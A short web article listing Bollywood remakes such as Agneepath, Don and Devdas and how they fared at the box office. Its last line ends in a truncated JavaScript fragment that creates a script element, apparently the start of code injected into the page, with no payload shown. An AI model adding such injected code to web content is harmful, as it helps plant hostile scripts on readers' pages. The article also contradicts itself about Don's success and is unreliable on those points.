Is Bollywood running out of ideas? If not, then why are our filmmakers remaking old Hindi films? Whatever be the reason, most Bollywood remakes have failed to live up to the old films. While films like Devdas and Don did rekindle old moments, others like Umrao Jaan was a big dud at the box office.
Take a look at some of the Bollywood remakes listed below.
Agneepath was originally made in 1990 and is one of the classics of all time. The film starred Amitabh Bachchan. The new Agneepath was produced by Karan Johar and starred Hrithik Roshan and Sanjay Dutt and was a huge hit, just like the original Agneepath.
Produced by Farhan Akhtar in 2006, Don is a remake of Don which was made in 1978, starring Amithab Bachchan then. Even though the expectations were really high from Don (2006) it failed to deliver results. The film starred Shahrukh Khan.
3. Bol Bachchan
Bol Bachchan is Rohit Shetty’s kitschy retelling of Hrishikesh Mukerjee’s acclaimed comedy Gol Maal. Like Gol Maal, Bol Bachchan too proved it’s worth at the box office. The film starred Abhishek Bachchan and Ajay Devgan.
In 1981 when Rekha starred in Umrao Jaan, the film attracted audiences from all parts of India making it one of the biggest hits. But in 2006, when J.P Dutta re-made the film, taking Aishwarya Rai in the main lead, the film failed to create magic at the box office. But Aishwarya’s performance was praised by the critics and the audience.
The 2002 blockbuster Devdas, is also a remake of an old Indian classic also named Devdas. Devdas, first released in 1955. it starred Dilp Kumar.var d=document;var s=d.createElement(‘script’);
